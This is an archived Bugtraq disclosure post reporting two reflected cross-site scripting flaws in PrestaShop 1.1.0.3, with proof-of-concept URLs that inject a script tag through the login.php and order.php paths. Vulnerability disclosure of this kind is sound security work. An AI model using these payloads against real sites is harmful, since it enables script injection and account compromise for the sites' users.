[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Two XSS Flaws in PrestaShop 1.1.0.3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Two XSS Flaws in PrestaShop 1.1.0.3
From: th3.r00k.ieatpork@xxxxxxxxxxxxxx
Date: Sun, 7 Dec 2008 20:32:37 -0700

Affects PrestaShop 1.1.0.3
product: homepage: http://prestashop.com

This is XSS in the URI of PrestaShop.  Trust no one,  not even your 
$_SERVER[PHP_SELF] .

http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E

Add an item to the shoping cart and then vist this url:
http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E

Peace

Prev by Date: [SECURITY] [DSA 1682-1] New squirrelmail packages fix cross site scripting
Next by Date: XSS in PHPepperShop v 1.4
Previous by thread: [SECURITY] [DSA 1682-1] New squirrelmail packages fix cross site scripting
Next by thread: XSS in PHPepperShop v 1.4
Index(es):
- Date
- Thread